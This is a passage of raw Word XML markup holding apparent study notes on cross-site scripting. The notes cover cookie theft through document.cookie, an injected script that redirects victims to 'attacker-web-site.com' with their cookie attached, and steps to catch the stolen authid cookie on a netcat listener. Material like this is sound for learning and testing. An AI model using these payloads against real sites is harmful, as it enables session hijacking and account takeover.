        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Write Keyloggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D2C2B" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This would allow an attacker to extract sensitive information from a user such as credit card details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727462A8" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>General Spam:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F9BC97" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An attacker could just be a nuisance and ruin a user’s experience with a website by manipulating various elements on the page and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C4ECE9" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C16A75" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For this scenario, we’ll focus on stealing a cookie. On a web page, cookies can be accessed using the following javascript syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681DCCBD" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A445E61" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Having this payload executed alone would not be not beneficial to an attacker. They’ve managed to access the cookie, but how would they actually retrieve it? A common method is to redirect a user to a domain including the cookie as a parameter. This is done using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE5826A" w14:textId="26CBEC4A" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;script&gt;window.location = ‘attacker-web-site.com/page?param=’ + document.cookie &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78349E8F" w14:textId="06C1A2DD" w:rsidR="00DA2F34" w:rsidRDefault="00DA2F34" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>create nc listener on attacker machine with correct port (80 for http, etc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D91A40B" w14:textId="58F9E54E" w:rsidR="00BE44ED" w:rsidRDefault="00BE44ED" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>test for XSS in comment or post box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2D229" w14:textId="633FE1A3" w:rsidR="00DA2F34" w:rsidRDefault="00DA2F34" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ex. &lt;/p&gt;&lt;script&gt;console.log(“XSS Works”)&lt;/script&gt;&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F0445" w14:textId="40794B77" w:rsidR="00DA2F34" w:rsidRDefault="00DA2F34" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>enter above script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850DD5D" w14:textId="474CA02F" w:rsidR="007503D2" w:rsidRDefault="007503D2" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007503D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;script&gt;window.location = ‘attacker-web-site.com/page?param=’ + document.cookie &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA128C" w14:textId="498A4EFA" w:rsidR="007503D2" w:rsidRPr="007503D2" w:rsidRDefault="007503D2" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Wait for reply within listener to find authid cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC8C172" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B2214E" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here window.location redirects the user to the attacker controlled web site and passes in the cookie as a parameter. The attacker can then access the server log, retrieve this cookie and log in as the user. This isn’t the only way of retrieving the cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4A6F2" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Make an XML HTTP request to an attacker controlled domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F756442" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is more stealthy as you wouldn’t have to redirect the user to a different page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059429B9" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Make the cookie visible to an attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2011477F" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If you manage to get XSS on some sort of forum/message, you can re-create the request used to add data to these pages. Once an attacker visits these pages, they can just view the cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F089D5" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E4A126" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Making Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4506F071" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">As mentioned above, extracting a cookie using a request is quite common. These requests can be either </w:t>
      </w:r>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and are usually done using AJAX(Asynchronous Javascript). This </w:t>
      </w:r>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>works well because AJAX can interact with a server in the background(there’s no need to update or reload a page). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6E03F7" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here the first line creates the XML HTTP request and stores it in the variable. The second line uses the open function to initialise the variable. It tells the browser what method to use(get or post), what path to send it to(in this case ‘/location’), and whether the request is asynchronous(true or false). In most cases, we want the request to be asynchronous so that the browser page doesn’t reload and the request is sent in the background. Line 3 is optional and sets the content type header to ensure that the browser is sending data in a format that the server needs. Line 4 actually sends the request - the [body-param] is only necessary for a POST request and can have different formats(like JSON). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AEB20" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B3B2702" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When injecting this payload into a page, we won’t be able to separate them like shown above. So we’d put everything on one line(which is why the semicolons at the end of each line is important. Semicolons are used to indicate that a request is complete). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67543F48" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512FD0E9" w14:textId="554CC556" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Before making an AJAX call, it’s important to know the format of the request. You can look at what exactly is involved in a request using </w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Burp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Alternatively, you can open the developers tool and keep the network tab open will you carry out request.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The network tab shows you all the headers for the request and will even show you response information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E4A4B" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473"/>
    <w:p w14:paraId="4C24FC4E" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Finding XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>As mentioned above, your payload can be added to different aspects of a page. One common aspect is between HTML tags. For example, imagine that a username is added inside the paragraph tags like</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F02D1A" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;p&gt; username &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FF2672" w14:textId="77777777" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
